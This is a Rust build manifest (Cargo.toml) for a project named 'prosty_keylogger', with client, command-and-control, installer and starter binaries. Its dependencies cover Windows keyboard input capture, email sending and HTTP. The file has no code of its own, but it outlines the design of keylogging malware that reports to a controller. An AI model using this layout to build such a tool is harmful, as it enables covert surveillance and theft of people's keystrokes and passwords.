[package]
name = "prosty_keylogger"
version = "0.1.0"
edition = "2021"

[[bin]]
name = "client"
path = "src/client/main.rs"

[[bin]]
name = "cc"
path = "src/cc/main.rs"

[[bin]]
name = "installer"
path = "src/installer/main.rs"

[[bin]]
name = "starto"
path = "src/start/main.rs"



[dependencies]
windows = {version = "0.57.0", features = [
    "UI_Core", "Win32_Data", "Win32_Devices", "UI_Input",
    "UI_Input_Core", "UI_Text_Core", "Win32_UI_Controls",
    "Win32_UI_Input_KeyboardAndMouse"]}
chrono = "0.4.38"
fern = "0.6.2"
log = "0.4.21"
clap = { version = "4.5.7", features = ["derive"] }
lettre = {version = "0.11.7", features = ["sendmail-transport", "tokio1", "tokio1-native-tls"]}
tokio = {version = "1.38.0", features = ["rt", "rt-multi-thread", "macros"] }
reqwest = { version = "0.12.5", features = ["json"] }
actix = {version = "0.13.5"}
serde = { version = "1.0.203", features = ["derive"] }
serde_json = "1.0.117"
actix-web = {version = "4.7.0", features = []}
anyhow = "1.0.86"
rand = "0.8.5"
humantime = "2.1.0"
iced = {version = "0.12.1", features = ["advanced"]}
actix-files = "0.6.6"

[build-dependencies]
winres = "0.1.12"